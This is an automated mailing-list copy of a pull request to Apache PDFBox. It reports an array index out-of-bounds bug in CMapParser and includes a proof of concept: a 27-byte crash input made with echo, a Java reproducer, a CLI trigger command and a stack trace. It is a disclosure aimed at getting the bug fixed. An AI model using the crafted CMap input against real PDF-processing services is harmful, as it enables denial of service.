OwenSanzas opened a new pull request, #411:
URL: https://github.com/apache/pdfbox/pull/411

   # ArrayIndexOutOfBoundsException in CMapParser.increment()
   
   ## Summary
   
   CMapParser in Apache PDFBox's fontbox component does not properly validate 
array bounds when processing bfrange mappings, causing an 
`ArrayIndexOutOfBoundsException` when processing malformed CMap data with empty 
hex strings.
   
   **Type**: Array Index Out-of-Bounds (CWE-129)
   **Severity**: Medium
   **Impact**: Denial of Service (application crash)
   **Affected Component**: 
`fontbox/src/main/java/org/apache/fontbox/cmap/CMapParser.java:813`
   
   ## Root Cause
   
   ### Vulnerable Code (CMapParser.java:454-467)
   
   ```java
   private void addMappingFrombfrange(CMap cmap, byte[] startCode, int values,
           byte[] tokenBytes)
   {
       for (int i = 0; i < values; i++)
       {
           String value = createStringFromBytes(tokenBytes);
           cmap.addCharMapping(startCode, value);
           if (!increment(tokenBytes, tokenBytes.length - 1, strictMode))
           {
               break;
           }
           increment(startCode, startCode.length - 1, false);  // passes -1 
when length == 0
       }
   }
   ```
   
   ### Crash Location (CMapParser.java:813)
   
   ```java
   private static boolean increment(byte[] data, int position, boolean 
useStrictMode)
   {
       // ...
       data[position] = (byte) (data[position] + 1);  // CRASH: data[-1]
   }
   ```
   
   When malformed CMap data contains empty hex strings (`<>`), `startCode` is a 
zero-length byte array. `startCode.length - 1` evaluates to -1, passed to 
`increment()` which crashes accessing `data[-1]`. Both overloaded 
`addMappingFrombfrange()` methods have this issue.
   
   ## PoC
   
   ### Trigger file
   
   A crafted `malicious_cmap.pdf` with a Type0 font containing malformed CMap 
bfrange data with empty hex strings.
   
   ### How to generate crash.bin
   
   ```bash
   echo -n '0<>2.beginbfrange<><><2223' > crash.bin
   ```
   
   **Content** (27 bytes): CMap fragment with empty start/end codes in bfrange 
section.
   
   ### How to generate malicious_cmap.pdf
   
   ```bash
   python3 create_malicious_pdf_cmap.py
   ```
   
   ---
   
   ## Trigger Method 1: Official pdfbox-app CLI
   
   ```bash
   java -jar pdfbox-app-4.0.0-SNAPSHOT.jar export:text -i malicious_cmap.pdf -o 
output.txt
   ```
   
   **Output:**
   ```
   java.lang.ArrayIndexOutOfBoundsException: Index -1 out of bounds for length 0
        at org.apache.fontbox.cmap.CMapParser.increment(CMapParser.java:813)
        at 
org.apache.fontbox.cmap.CMapParser.addMappingFrombfrange(CMapParser.java:466)
        at 
org.apache.fontbox.cmap.CMapParser.parseBeginbfrange(CMapParser.java:437)
        at org.apache.fontbox.cmap.CMapParser.parse(CMapParser.java:118)
        at 
org.apache.pdfbox.pdmodel.font.CMapManager.parseCMap(CMapManager.java:72)
        at org.apache.pdfbox.pdmodel.font.PDFont.readCMap(PDFont.java:221)
   ```
   
   ---
   
   ## Trigger Method 2: Direct API
   
   ```java
   import org.apache.fontbox.cmap.CMap;
   import org.apache.fontbox.cmap.CMapParser;
   import org.apache.pdfbox.io.RandomAccessReadBuffer;
   
   public class Reproduce {
       public static void main(String[] args) throws Exception {
           byte[] cmapData = "1 beginbfrange\n<> <> <2223>\nendbfrange"
                   .getBytes("US-ASCII");
           CMapParser parser = new CMapParser();
           CMap cmap = parser.parse(new RandomAccessReadBuffer(cmapData));
           // ArrayIndexOutOfBoundsException: Index -1 out of bounds for length 0
       }
   }
   ```
   
   ---
   
   ## Impact
   
   | Aspect | Details |
   |--------|---------|
   | **Type** | Denial of Service (DoS) |
   | **Severity** | Medium |
   | **Attack Vector** | Malicious PDF with crafted Type0 font (malformed CMap) 
|
   | **Payload Size** | 27 bytes |
   | **Affected Operations** | Text extraction, rendering, any PDF processing 
with Type0 fonts |
   | **CWE** | CWE-129 (Improper Validation of Array Index) |
   | **Related** | PDFBOX-6141, PDFBOX-6142 (related fixes, but this case not 
covered) |
   
   ---


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: [email protected]

For queries about this service, please contact Infrastructure at:
[email protected]


---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

Reply via email to